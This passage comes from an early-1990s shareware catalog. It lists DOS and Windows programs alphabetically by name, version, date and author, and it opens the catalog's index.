(07-10-91) -- LOGIVISION INC. + Lotto Challenger 3.6 (01-01-91) -- Data Solutions + LOTTO PROPHET 3.01 (06-01-91) -- DataMicro, Inc + The LOTTO SIMULATOR 1.0 (08-20-91) -- Brentson Worrell + Lotto Thunder 1.00 (10-21-91) -- Charles P.Staats + LottoMATIC 1.01B (03-22-92) -- Custom Technologies + LoveDOS 1.3 (06-01-91) -- R.K. West Consulting + LQ 2.35 (10-01-90) -- Granny's Old-Fashioned Software + LQMATRIX 4.41 (04-12-92) -- Jimmy Paris Software + MacIntosh Author Application n/a (07-01-91) -- Association of + Shareware Professionals + + Appendix E, "Sorted list of all programs" 516 + + + + Magic Brush & Magic Show 1.50 (08-16-89) -- Nassib Nassar + Mah Jongg--Solitaire 3.51 (08-09-91) -- Arcanum Computing + Mail Machine 3.0k (03-12-92) -- TaxWare + Maillist / M-Label 5.25/3.2 (01-29-92) -- R.K. West Consulting + MakeDemo 3 (06-04-91) -- WindhamWoods Publishing + Maker 1.02 (06-09-91) -- Richard W. Adams + Man/machine Process 3.0 (11-15-91) -- ALPS Software + Man/Machine Process(PC) 3.0 (11-15-91) -- ALPS Software + Mass-Store Copy 2.6 (04-01-91) -- Informative Technologies + Master Meal Manager 1.51 (01-09-92) -- Thomas C. Johnson + MAXI Form 1.7 (02-14-92) -- Herne Data Systems Ltd + MaxMan 1.2 (05-28-90) -- ShareGames + Mayan Calendar 3.51 (03-01-92) -- R.K. West Consulting + MAZE3 3.0.6 (01-19-89) -- Stiller Research + MegaHost 1.1 (02-15-92) -- ASCII Computer Enterprises + Melissa's Music Flashcards 2.0 (01-30-92) -- Fischer Grafix & + Software + MEMORY 2.2R (04-01-91) -- Jimmy Paris Software + MENU-MAN 1.21 (05-24-91) -- Micrometric + MenuDIRECT Gold 3.0 (06-01-91) -- Applied Micro Systems + Technology + MenuEase 1.6.3 (08-10-91) -- Creative Computer + Mercury 2.06 (07-01-91) -- Real Software + Methods Time Measurement 3.0 (11-15-91) -- ALPS Software + Methods Time Merasurement(PC) 3.0 (11-15-91) -- ALPS Software + Mille French Card Game 1.2 (11-15-91) -- Unique Software + Mom's Math 3.0 (03-03-92) -- Motes Educational Software + Money Smith 1.2 (09-15-91) -- Money Smith Systems + MORFORM 1.0 (03-01-91) -- MORSOFT + MORSOFT CALCULATOR 2.0 (07-01-89) -- MORSOFT + MouseTools 1.0 (09-13-89) -- Arcanum Computing + Mover 2.11 (06-09-91) -- Richard W. Adams + Movie Guide 3.0 (07-15-91) -- SANDD Software + MULTIFILE-XL 1.7 (08-22-91) -- H&P Software + Multilevel Marketing Simulator 2.00 (06-28-91) -- LRV Company + Music Manager for Windows 1.10 (03-15-92) -- Joe Herrera + MuziTrak System 1.11 (10-08-91) -- Blam Entertainment Group + My Little Realm 1.0 (04-01-92) -- My Little Realm + NAMEBASE 3.1 (03-26-92) -- Elk Creek Software + NAMEGRAM 3.0 (06-12-89) -- Neil J. Rubenking + Names & Dates 4.2 (04-26-91) -- WR Software + NED 1.6b (02-18-92) -- David L. Dight + NETCLASS 1.00 (03-05-92) -- Pyramid Software + NEWBIZ 1.0 (03-08-92) -- Centre for Commercial Innovation (CCI) + Newkey 5.4 (06-21-91) -- FAB Software + Nine Men's Morris 1.03 (05-31-91) -- Langin Software + NPS - Nominal Pipe Size e1.2 (02-08-92) -- Herne Data Systems Ltd + Oak Hill Vi(tm) 5.7A (05-18-91) -- Oak Hill Software, Inc. + OffLoad 1.1 (03-01-91) -- FBN Software + OMNIDay 2.29b (12-18-91) -- Unicorn Software Limited + OMNIDiZk 2.90 (11-25-91) -- Unicorn Software Limited + OMNIMeal 3.03 (09-01-91) -- Unicorn Software Limited + On This Day 1.1 (11-26-91) -- The Software Construction Co. + Operation Process 3.0 (11-15-91) -- ALPS Software + + Appendix E, "Sorted list of all programs" 517 + + + + Operation Process(PC) 3.0 (11-15-91) -- ALPS Software + Operator Process 3.0 (11-15-91) -- ALPS Software + Operator Process(PC) 3.0 (11-15-91) -- ALPS Software + ORGANIZE 2.12 (05-16-91) -- David H. Pritchett + ORGANIZE! Jazz Collection 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Memorabilia 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Professional Books 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Art 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Books/Magazines 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your CDs & Records 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Coin Collection 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Comic Books 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Fabrics 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Guns 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Home 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Model Railroad 5.27 (03-31-92) -- HomeCraft + Software + ORGANIZE! Your Plants/Garden 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Sports Cards 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Stamp Collection 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Video Tapes 5.27 (03-23-92) -- HomeCraft Software + An Ounce Of Prevention 1.05 (07-01-91) -- Pete Maclean Software + OutFox 2.1 (10-19-90) -- ShareGames + Overhead Cost 3.0 (11-15-91) -- ALPS Software + Overhead Cost(PC) 3.0 (11-15-91) -- ALPS Software + Over_LAZ 2 (02-14-92) -- Herne Data Systems Ltd + Over_LAZ PS 2 (02-14-92) -- Herne Data Systems Ltd + PACE 1.0 (11-22-90) -- Mark Tigges + PAGE COUNT 2.0A (11-23-91) -- Tinker Software + Painless Accounting 5.41 (06-18-91) -- Painless Accounting + Painless Acct/Payroll Companion 5.0 (06-04-91) -- Painless + Accounting + Painless Event Processor 1.01 (05-31-91) -- Painless Accounting + Painless Menu Manager 5.0 (08-31-91) -- Painless Accounting + Painless Payroll 1.08 (05-27-91) -- Painless Accounting + Paint Shop Pro 1.01 (03-26-92) -- JASC, Inc. + PAK 2.51 (10-08-90) -- NoGate Consulting + PALERT 2.3 (06-12-91) -- Patri-Soft + Pallanda 1.6 (01-27-91) -- ShareGames + Parcel Shipping Program(PSP)(r) 2.4 (02-24-92) -- East Hampton + Industries + PATH-MAN 1.10 (05-24-91) -- Micrometric + PathProj 9103 (03-01-91) -- softRX shareware + PATIENCE 10 3.31 (06-11-91) -- CoCoWare - Cowles Company Software + PATTR 1.5 (12-26-90) -- Patri-Soft + PAYMENT BOOK WRITER 2.0 (04-13-91) -- H&P Software + PBfmt 1.99 (07-21-91) -- Unique Software + PBMouse 1.0 (01-01-91) -- Barry Erick + + Appendix E, "Sorted list of all programs" 518 + + + + PBWindows 2.5 (09-01-91) -- Barry Erick + PC Canary 91g (05-15-91) -- Compass / New England + PC Chart (CGA/HGC) 1.4 (01-01-92) -- Guru Systems Ltd. + PC SYSTEM MANAGER 2.0 (07-01-90) -- MORSOFT + PC-AP Accounts Payable 1.6 (01-01-92) -- Medlin Accounting + Shareware + PC-AR Accounts Receivable 4.1 (01-01-92) -- Medlin Accounting + Shareware + PC-CAI 2.05 (05-24-91) -- TexaSoft + PC-CHART (EGA/VGA) 1.4 (01-01-92) -- Guru Systems Ltd. + PC-DEAL 2.45 (06-15-91) -- KINDRED SPIRITS + PC-Draft II 3.26 (01-01-91) -- Natural Software + PC-Draft-CAD 3.06 (06-01-91) -- Natural Software + PC-ECAP 2.01 (02-03-92) -- Circuit Systems + PC-FasType/CGA 4.3 (08-01-91) -- Trendtech Corporation + PC-FasType/MONO 1.3 (08-01-91) -- Trendtech Corporation + PC-FOOD 5.2 (09-08-91) -- Schreck Software + PC-GL General Ledger 3.6 (01-01-92) -- Medlin Accounting + Shareware + PC-GLOSSARY 4.2 (04-01-92) -- Disston Ridge, Inc. + PC-HAM 5.52 (03-20-91) -- Software for Amateur Radio + PC-INFO 2.17 (05-27-91) -- Cheat River Engineering + PC-Names 1.32 (02-05-91) -- WR Software + PC-PR Payroll Writing 2.1 (02-01-92) -- Medlin Accounting + Shareware + PC-STRAN(tm) 4.31 (04-01-91) -- Joe Murphy + PC-TRACK 2.14 (01-09-92) -- Thomas C. Johnson + PCBRIDGE(tm) 2.60 (01-01-90) -- Joe Murphy + PCBUDGET 2.5 (03-24-92) -- ProLogic Software + PCCLOCK 2.14 (04-30-91) -- Michael J. Sadaway + PCFDial 1.04 (01-22-92) -- Barn Owl Software + PCForm 2.3 (01-25-92) -- CareWare + PCINV Invoice Writing 1.1 (01-01-92) -- Medlin Accounting + Shareware + PCM100.COM 1.01 (08-25-91) -- Yves Charier + PCOPY 9.0D (04-01-91) -- Patri-Soft + PCStat 2.3 (08-01-91) -- PC Information Systems + PCX2FNT 1.1 (03-29-92) -- TaxWare + PCX2PCL 1.4 (01-01-92) -- TaxWare + PDAILY 1.0 (08-18-90) -- Patri-Soft + PDEL 4.2 (12-26-90) -- Patri-Soft + pE - The "perfect" Editor(tm) 2.77 (08-25-91) -- Just Excellent + Software, Inc. + pEDIT PLUS 1.0 (12-15-91) -- T. G. Muench + PEG 1.03 (02-10-92) -- Cascoly Software + Peronal Record Keeper 1.1 (09-01-90) -- Professional Automated + Systems + Personal Calendar (PC) for DOS 14.41 (03-10-92) -- FunStuff + Software (Paul Munoz-Colman) + Personal Golf Tracker 2.1 (07-15-91) -- John L. Hancock + Personal Tarot 2.52 (03-01-92) -- R.K. West Consulting + Personal Time Card 1.0 (02-03-92) -- Fischer Grafix & Software + PhoneBook 1.0 (04-01-92) -- Robert M. Bernard + PIANOMAN 4.01 (02-08-89) -- Neil J. Rubenking + + Appendix E, "Sorted list of all programs" 519 + + + + PixFolio Image Catalog System 1.03.6 (01-24-92) -- ACK Software + Plain Vanilla Labels 3.13 (12-14-91) -- Rosewood Software + Play 'n' Learn 3.00 (01-15-92) -- HomeCraft Software + Play For Mate 1.1 (03-28-92) -- Niche Software + Plot-Line 1.7 (01-04-91) -- PlotSoft Solutions + PlotManager 2.22 (05-13-91) -- John Intorcio + PM2LINO 1.0 (03-01-92) -- JMJ Software + PMZIP 1.00 (01-14-91) -- Nico Mak + PoeTrio 1.0 (06-01-91) -- Chatfield Software, Inc. + Poetry Generator 2.1 (06-01-91) -- R.K. West Consulting + Poetry Star 1.2 (03-15-92) -- Chatfield Software, Inc. + Point & Shoot Backup/Restore 2.1 (10-01-90) -- Applied Micro + Systems Technology + Point & Shoot Home Manager 2.0 (09-01-88) -- Applied Micro + Systems Technology + The Pool Manager 2.0 (08-05-90) -- American Systems + PopDBF 4.0 (08-01-91) -- Bowen Software + PostCardMaster 3.51 (10-01-91) -- Unicorn Software Limited + PowerBatch Compiler 1.4j (05-08-91) -- CSD, Inc. + PPRINT 5.3 (04-29-91) -- Patri-Soft + PREP 1.2 (08-23-91) -- Southwind Software + Prgmr's Productivity Pack Lite 1.01 (03-25-90) -- Falk Data + Systems + Print-it 1.0 (01-11-90) -- Cybernetic Software + PrintCAD 1.14 (04-26-92) -- Ravitz Software Inc. + PrintEnvelope 2.30 (03-04-92) -- Maurer Associates + PrinterBUDDY 2.01 (03-29-92) -- Lenard Dean + PrintGL 1.24 (04-26-92) -- Ravitz Software Inc. + PrintPlus 6.0 (01-01-92) -- Lambert Klein + PRO$TOCK 1.5 (05-01-91) -- Gateway Software + PRO-CR 2.02 (06-02-91) -- Gray Design Associates + Probat I (09-11-88) -- Mark Tigges + ProDev*EPRICE 4.10 (05-01-91) -- Pro Dev Software + ProDev*MEMBER 2.0 (04-15-92) -- Pro Dev Software + ProDev*QUOTE 4.10p (05-01-91) -- Pro Dev Software + ProDev*QUOTE Utility Programs 4.10p (05-01-91) -- Pro Dev + Software + Professional Master Key 3.2 (04-10-91) -- Public Brand Software + Programmer's Productivity Pack 2.61 (05-12-91) -- Falk Data + Systems + Programmer's SUPER-MAINT 2.11 (10-01-91) -- EmmaSoft + PROPLUS 1.62 (06-15-91) -- Gateway Software + PS-SLEEVE 2.0 (03-01-92) -- JMJ Software + PS-TEXT 1.0 (08-01-91) -- JMJ Software + PSEARCH 4.4e (04-10-91) -- Patri-Soft + PTOUCH 2.0 (08-18-90) -- Patri-Soft + Public Address 2.1 (03-10-92) -- Paradise Programming + PullDown SAA Menu Shell 3.20 (07-08-91) -- MicroDynamics + Development + PURGE 2.20 (03-01-92) -- Software Designs, Inc. + PUTMAIL 1.3 (01-01-92) -- Gnosis Inc + Q&A Study Aid 3.90 (09-01-91) -- Quid Pro Quo Software + Q4Tool 1.5 (02-08-92) -- CareWare + Qanalyst 2.05 (09-19-90) -- Barn Owl Software + + Appendix E, "Sorted list of all programs" 520 + + + + QEdit(R) Advanced 2.1 (04-03-90) -- SemWare + QFiler 3.2 (07-15-91) -- Jamestown Software + QFont 1.5 (10-20-90) -- Jamestown Software + QPACS 3.2 (01-01-92) -- Richard A. Williams + QQUERY (All Fox versions) 2.10E (08-01-91) -- Carlos Berguido + QQUERY (FoxBASE+ 2.10 version) 2.10E (08-01-91) -- Carlos + Berguido + QQUERY (FoxPro 1.02 version) 2.10E (08-01-91) -- Carlos Berguido + QQUERY (FoxPro 2.0 version) 2.10E (08-01-91) -- Carlos Berguido + Quilt 1.21 (03-30-92) -- Cascoly Software + Ravitz Editor 1.10 (08-31-91) -- Ravitz Software Inc. + RECALL 2.5 (04-11-91) -- Patri-Soft + Recap 2.3 (01-01-92) -- R.K. West Consulting + Recon(tm) 2.01 (06-18-91) -- Amdox Co. Ltd. + Recursive Realm 3.0 (09-01-91) -- Austin Software Design + Renamer 1.01 (06-09-91) -- Richard W. Adams + ReNamer 1.1 (06-30-91) -- ConVal Software, Inc. + Renamer/2 1.01 (07-07-91) -- Richard W. Adams + Resident Task Manager 2.11 (01-05-91) -- WetZoft Applications + The Retailer 4.05 (12-19-91) -- RetailWare + REXL-Lazarillo de Tormes 1.1 (12-03-91) -- REXL + Richard Webster Programs 2.1 (03-01-92) -- R.K. West Consulting + RIE - Rimrock Icon Editor 1.04 (02-20-92) -- Rimrock Software + RoDrones 1.2 (02-04-90) -- ShareGames + Room 2.11 (06-09-91) -- Richard W. Adams + Rosewood Journal 4.12 (01-27-92) -- Rosewood Software + Rubicon Publisher 2.2C (06-08-91) -- Rubicon Computer Labs Inc. + RXridge 9104 (04-01-91) -- softRX shareware + RXtraces 9103 (03-01-91) -- softRX shareware + SAFEPACK 1.2 (04-02-92) -- D J Harvey Software + Save the Planet 2.50 (01-31-92) -- Save the Planet Software + Savings Account Management Prg. 1.0 (06-22-89) -- M. P. Data + School-Mom 3.58 (12-31-91) -- Motes Educational Software + See Mail 1.3 (03-20-91) -- Gnosis Inc + SeedMaster 2.1 (11-01-90) -- White Harvest Software, Inc. + Sell More Software 3.0 (12-31-91) -- Droege Computing Services, + Inc. + Serial++ Asynch Comm Library 1.0 (02-07-91) -- Cortlandt + Technologies + Service Business Design 1.1 (03-23-92) -- Niche Software + SHERLOCK 2.60 (07-04-91) -- Gulf Sierra + Shez 7.0 (03-30-92) -- California Software Design + Shooting Gallery 2.3 (12-16-91) -- Arcanum Computing + Show Partner Lite 3.7 (09-01-91) -- Brightbill-Roberts and + Company, Ltd. + Shredder/2 1.10 (01-23-91) -- Richard W. Adams + Simply Help! 1.0 (01-07-91) -- SimpleWare + Simply Labels IIIa (07-01-91) -- SimpleWare + SlideManager 5.13 (05-13-91) -- John Intorcio + SLIM 1.10 (02-20-91) -- Dominic Herity + Sloop Manager 1.2b (01-27-92) -- Sloop Software + Smart Home Shopper 1.2 (06-07-91) -- Torbert Data Systems, INC. + Smart10 1.2 (10-06-91) -- Sympathetic Software + SNAP! 5.0 (01-10-92) -- Walter J. Kennamer + + Appendix E, "Sorted list of all programs" 521 + + + + Snooper, the system checker 1.50 (03-30-92) -- John Vias + SOFF BALLS 3.2 (11-28-91) -- Computater Software + SoundZ 2.21 (04-08-92) -- Unicorn Software Limited + Space Relationship 3.0 (11-15-91) -- ALPS Software + Space Relationship(PC) 3.0 (11-15-91) -- ALPS Software + Spell Games 1.1 (06-01-91) -- TexaSoft + Spider Web 1.4 (03-04-90) -- ShareGames + Spin Wall 1.6 (05-28-91) -- ShareGames + SR-Info 3.30 (09-01-91) -- Sub Rosa Publishing Inc. + SST: the Supersonic Search Tool 5.2b (05-12-91) -- Keith + Ledbetter + Stable - Technical Graphs 1.00 (09-25-91) -- WINTERRA Software + Group + STACKEY 4.0 (12-23-91) -- CTRLALT Associates + STAFF-BASE 3.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-DBMS-PRODUCT-FAMILY XX (06-01-91) -- MSC - Morariu Software + Consulting + STAFF-DEVELOPER 1.0 (06-01-91) -- MSC - Morariu Software + Consulting + STAFF-DIAL 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-GRAF 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-INTEGRATOR 2.0 (01-01-91) -- MSC - Morariu Software + Consulting + STAFF-KICK 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-MASK 1.2 (06-01-91) -- MSC - Morariu Software Consulting + STAFF-REPORT 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-UTIL 2.0 (01-01-91) -- MSC - Morariu Software Consulting + Stamper 1.11 (01-01-92) -- Richard W. Adams + STARTREK the Computer Program 1.00 (05-25-90) -- Software for + Amateur Radio + Statistical 3.0 (11-15-91) -- ALPS Software + Statistical(PC) 3.0 (11-15-91) -- ALPS Software + $tokTraX 4.05 (02-24-92) -- Stoktrax Systems + Stringer/2 1.02 (06-06-90) -- Richard W. Adams + Strudle 3.8 (06-22-90) -- ShareGames + STS26 7.0 (10-08-90) -- Robert L. Lloyd + Super StarTrek 5.5 (01-12-91) -- ShareGames + SuperFly 1.1 (10-29-90) -- Arcanum Computing + Swap! 1.5 (11-26-90) -- Trinity Software + SWAPDOS 1.00 (02-01-90) -- Innovative Data Concepts, Inc. + SWAPDS 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPLM 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPMM 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPNG 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPSK 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPTN 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SwimBase 1.60 (03-01-92) -- Words to Go + Systems Manager 2.5 (02-10-91) -- MiCord + T-Zero 1.03 (05-19-91) -- Dennis Cunningham + Tag! 1.51 (05-02-91) -- Trinity Software + Takin' Care of Business! AP 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! AR 1.0C (03-01-91) -- Hooper + International, Inc. + + Appendix E, "Sorted list of all programs" 522 + + + + Takin' Care of Business! GL 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! IN 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! M&C 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! PR 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! PS 1.0C (03-01-91) -- Hooper + International, Inc. + TAPCIS 5.4 (12-17-91) -- Support Group, Inc. + Task Master 2.3 (04-27-92) -- RKS Software, Inc. + TAX91 1.0 (01-01-92) -- F. Roland Bjorklund + TCXL User Interface Development 5.52 (09-01-91) -- Innovative + Data Concepts, Inc. + TDisplay 1.2 (02-03-92) -- Trinity Software + TEACHER 2.0A (11-23-91) -- Tinker Software + Tear Down the Wall 1.02 (05-06-91) -- Langin Software + Technical Editor 2.61 (09-02-91) -- Superior Soft + TechnoJock's Object Toolkit 1.00 (07-01-91) -- TechnoJock + Software, Inc. + TechnoJock's Turbo Toolkit 5.02 (01-01-91) -- TechnoJock + Software, Inc. + TesSeRact Compression System 1.00 (09-01-91) -- Innovative Data + Concepts, Inc. + TesSeRact File Management 1.00 (09-01-91) -- Innovative Data + Concepts, Inc. + TesSeRact Printer Control 1.00 (09-01-91) -- Innovative Data + Concepts, Inc. + TesSeRact Screen Designer 1.00 (09-09-91) -- Innovative Data + Concepts, Inc. + TesSeRact TSR Devel. System 1.10 (09-01-89) -- Innovative Data + Concepts, Inc. + TextCon 1.73 (05-23-91) -- CrossCourt Systems + TextOut/5 2.02 (06-09-91) -- CrossCourt Systems + Textshot 2.1 (01-23-92) -- McAdams Associates + Tikler 3.95 (03-22-91) -- Olsen Outdoors + TiltMaze 1.1 (10-01-90) -- ShareGames + Time is Money 2.2 (07-20-91) -- Custom Data Solutions + TimeStax 2.5a (02-01-91) -- Johnson Technologies + TimeTrac 91f (06-01-91) -- Compass / New England + Tolman Dental Program 3.1 (03-01-92) -- Peter T. Smith D.D.S. + Total Control 2.005 (11-15-91) -- Unique Software + Total Investor for 1-2-3 2.01A (06-01-91) -- Hughes Financial + Services + Total Investor for Symphony 2.01 (06-01-91) -- Hughes Financial + Services + TOUCH TYPE TUTOR 3.4 (05-14-91) -- Gray Design Associates + ToyBox II 2.00 (03-29-92) -- Virtual Magic Software + TransferTIME (TTIME) 2.0 (09-01-91) -- RGH Software + TreeTop 2.44 (03-02-91) -- Kilgore Software + TriAxis 2.1 (01-10-91) -- ShareGames + TrikTrak 2.0a (03-01-92) -- Rhode Island Soft Systems, Inc. + TSR Download 2.9b (05-20-91) -- Elfring Soft Fonts + + Appendix E, "Sorted list of all programs" 523 + + + + TUTOR.COM 4.5 (05-01-91) -- Computer Knowledge + UDECIDE 1.05 (04-20-91) -- Cascoly Software + Utility_Belt 1.1a (02-14-92) -- Herne Data Systems Ltd + Value Engineering 3.0 (11-15-91) -- ALPS Software + Value Engineering(PC) 3.0 (11-15-91) -- ALPS Software + VAR Grade 4.66 (12-11-91) -- VARed Software + VEHICLE COSTS 2.0 (01-01-92) -- Graham Ferguson + VERSAMAP 1.16 (02-21-92) -- Charles H. Culberson + VGAWHEEL V.1.70S (01-01-92) -- WHEEL Games + VIDEO BUFF 1.33 (01-01-92) -- CACHE MICROSYSTEMS + Video Librarian 3.5s (02-10-92) -- TurboSystemsCo + VIDEOCAT 7.2 (07-28-91) -- William A. Jackson + VideoMaster 7.50 (07-04-91) -- Unicorn Software Limited + VINO:FILE Cellar Master 2.15 (10-31-90) -- Mark Christian + VMiX 386 2.67 (12-20-91) -- Commercial Software Associates + (ComSoft) + Volcano Hunter 1.0 (06-15-91) -- Informative Technologies + Volume,Hours & Productivity 3.0 (11-15-91) -- ALPS Software + Volume,Hours & Productivity(PC) 3.0 (11-15-91) -- ALPS Software + Vortex 1.2 (04-06-91) -- ShareGames + WAMPUM 4.2 (12-31-90) -- Ward Mundy Software + WEBS 1.16 (02-27-92) -- Cascoly Software + What's Up(tm) 1.31 (06-02-91) -- Nassib Nassar + WHATS-UP 1.00 (04-01-91) -- Software for Amateur Radio + WinBatch 3.0A (02-15-91) -- Wilson WindowWare, Inc. + WinCheck 3.0A (03-15-91) -- Wilson WindowWare, Inc. + The Window BOSS & Data Clerk 7.01 (03-15-92) -- Star Guidance + Consulting, Inc. + WinEdit 1.1C (07-01-91) -- Wilson WindowWare, Inc. + WinGraph 1.00 (04-05-92) -- XWare, Inc. + WinPost 3.1a (09-18-91) -- Eastern Mountain Software + WINWHEEL 1.40 (03-15-92) -- WHEEL Games + WinZip 3.1 (04-06-92) -- Nico Mak + WOPR-WinWord Office POWER Pack 1.0 (07-07-91) -- Pinecliffe + International + WordMaster 1.7 (07-11-91) -- MasterWorks + WordZ 2.00 (07-31-91) -- Unicorn Software Limited + Workbase 3.24 (01-01-92) -- R.K. West Consulting + WorkQueue 1.9 (12-02-91) -- Lane Davis + World Name Game 6.10 (09-18-91) -- Robert L. Lloyd + The World's Simplest Computer 1.00 (03-28-91) -- Langin Software + WORLD29 2.9D (12-11-91) -- Robert L. Lloyd + Wynd-DOS 2.2 (08-01-91) -- Wyndware + Wyndfields for DOS 1.2 (08-01-91) -- Wyndware + Wyndfields for Windows 1.0 (04-01-92) -- Wyndware + Wyndshell 2.2 (08-01-91) -- Wyndware + XDIR 3.05 (03-09-91) -- XD Systems + XPENS 1.1 (01-10-92) -- Richard A. Williams + XRS ("eXpress Response System") 4.50 (07-21-91) -- Smokin' + Software + YieldBook 1.2 (02-17-92) -- Compound Solutions + Your ESP Test 1.1 (01-01-92) -- R.K. West Consulting + Your Numerologist 1.03 (02-13-91) -- Unique Software + YRWAY 1.0 (01-24-92) -- Tinker Software + + Appendix E, "Sorted list of all programs" 524 + + + + YRWAYx.ZIP 2.2 (03-10-92) -- Tinker Software + Zephyr 2.0 (12-31-90) -- Ward Mundy Software + ZideCar 2.10 (03-09-92) -- Unicorn Software Limited + ZiPaper 1.3c (12-30-91) -- Daniel Thomas + ZPAY 3 3.4 (01-12-92) -- ZPAY Payroll Systems, Inc. (Paul Mayer) + Zpeller 2.00 (04-11-92) -- Unicorn Software Limited + ZZT Arcade-Adventure Game 3.0 (06-10-91) -- Potomac Computer + Systems + + Index 525 + + + + + + + + Index + + 80286 utilities See: AntiC 418, 462 + Utilities, Hardware APCAL 96, 436 + utilities, 286/386/486 Approved Vendor + utilities Requirements 427, 470 + 80386 utilities See: Architectural Engineering + Utilities, Hardware 259, 467 + utilities, 286/386/486 AS-EASY-AS 148, 457 + utilities ASP 115 + 80486 utilities See: ombudsman 426 + Utilities, Hardware ASP BBS Membership + utilities, 286/386/486 Application 427, 470 + utilities ASP Catalog for BBSs 427, + 3 ball Juggler 405, 439 470 + -=Tab123=- 342, 442 ASP Catalog for CompuServe + 4DOS 10, 67, 450 428, 470 + 4EDIT 108, 444 ASP Catalog for GEnie 428, + 4FILES 108, 435 470 + 4Print 54, 457 ASP List of Approved BBSs + 4Shell for Windows 54, 469 428, 470 + $tokTraX 254, 438 ASP List of Approved + 4ZIP/4UNZIP 121, 444 Vendors 429, 470 + ATC: Air Traffic + A Controller 418, 462 + AC11TO10 342, 436 Attribution 32, 468 + ACCEL 244, 440 AutoCon 74, 444 + ACCU BBS Lister 181, 461 AxTrons 393, 460 + ACCU Music Printer 375, + 461 B + ActaeOn 109, 465 Babble! 142, 457 + ActCalendar 83, 460 Backup 28, 468 + ActMenu 99, 460 Backup/2 29, 468 + Address Book Solution 158, Badge-O-Magic 55, 452 + 461 BakupWiz 29, 447 + Aerosoft Fitness Log 367, Balloons 305, 455 + 440 Bannerific 382, 463 + AFFORD IT??? 255, 456 Bass Class 406, 452 + ALBUM KEEPER II 348, 462 BassTour 407, 452 + AlbumMaster 349, 448 BATUTIL 68, 447 + ALITE 148, 457 BBSs 427 + ALLY 343, 444 BCS Menu Program 100, 445 + ALPHAQUOTE 339, 449 BESTTEST 323, 447 + ALPS 258, 467 Better Diet Analyzer 365, + ALPS(PC) 258, 467 440 + AM-EDIT 127, 439 BlackJack! 404, 461 + AMORTIZATION TABLE 256, BLANK-IT 43, 449 + 451 Bmenu 100, 446 + AMORTZ 242, 465 Book Librarian 349, 445 + Ample Notice 83, 459 Book of Changes 377, 444 + + Index 526 + + + + BookBank 350, 460 Chris's Automobile + BOOKLET 55, 466 Recorder 381, 464 + BOOKLET-SCREEN 56, 466 CHRONOS 327, 462 + BOOT.SYS 75, 448 Church Membership Tracking + BootMaster 75, 435 Sys 386, 445 + Border 419, 462 Cipher 412, 468 + BOXER(tm) Text Editing Cipher-Ace Series 418, 437 + System 127, 468 Cipher for Windows 413, + BRAINdead2 404, 441 468 + Brandon's Bigbox 305, 449 Circle Link 419, 460 + BridgePal 399, 450 Citizen 50, 444 + Brother's Keeper 374, 446 CleanUp 394, 460 + Browse/2 40, 442 ClipMate for Windows 91, + Btr Help! 299, 446 438 + Btr Watch 171, 446 CLOCK 87, 436 + Business Plan Master (IBM) CM_FILER 109, 442 + 219, 435 CODE TO CODE 135, 449 + Business Plan Master (Mac) Collect! (VGA version) + 219, 435 351, 438 + By the Numbers 378, 444 COM-AND 177, 454 + Command Post 112, 443 + C Complement & Schedules + C.A.R.S. 191, 456 259, 467 + CADET 343, 444 Complement & Schedules(PC) + CALC_JNC 81, 436 260, 467 + Calculation Solitaire 401, CompUser 430, 448 + 445 CompuServe 426 + Calendar Keeper 83, 457 Computer Trivia Quiz 316, + Calendar Mate 84, 459 440 + CALendar preview for ConvDW 139, 443 + SideKick 2 119, 443 Convert To Structured + CALendar RePorT for BASIC 301, 449 + SideKick+ 120, 443 Creativity Package 142, + CALendar report for TRaVel 444 + 120, 443 CROSSDOWN 413, 437 + Canfield For Windows 401, Crossword Clipper for + 445 Windows 136, 457 + Capbuf 78, 462 Crossword Creator 136, + Capital Gainz 254, 464 414, 457 + Cash Control 245, 452 Crystal Ball 378, 444 + CassetteMaster 350, 448 CtrlcLib 289, 455 + CATALOG-ON-A-DISK 230, 468 Curses! 391, 444 + CatScan 187, 446 Custodial Requirements + CDMaster 351, 448 260, 467 + Changer/2 300, 468 Custodial Requirements(PC) + Charge Account Management 261, 467 + Prog. 257, 451 Custom#Menu 344, 442 + Checkbook Management + Program 252, 451 D + CheckMate Plus 191, 466 Dad's Choice 329, 452 + Cheque-It-Out 245, 459 DaMenu 12, 435 + Children's Graphics DARN! Don't Forget! 92, + Program 333, 452 468 + DasBOOT! 76, 452 + + Index 527 + + + + Data Master 155, 433 DIRECT MAINT 12, 453 + DayMaster 84, 448 Director 13, 468 + DAYO ACCOUNTS PAYABLE (AP) Directory Freedom 7, 460 + 191, 458 DIREDIT 110, 461 + DAYO ACCOUNTS RECEIVABLE DiscTrak System 361, 442 + (AR) 205, 458 Disk DUP 23, 469 + DAYO BACK ORDERS (BO) 201, Disk Manager (CUDM) 9, + 458 468 + DAYO BAR CODE 3 OF 9 212, Disk OrGanizer 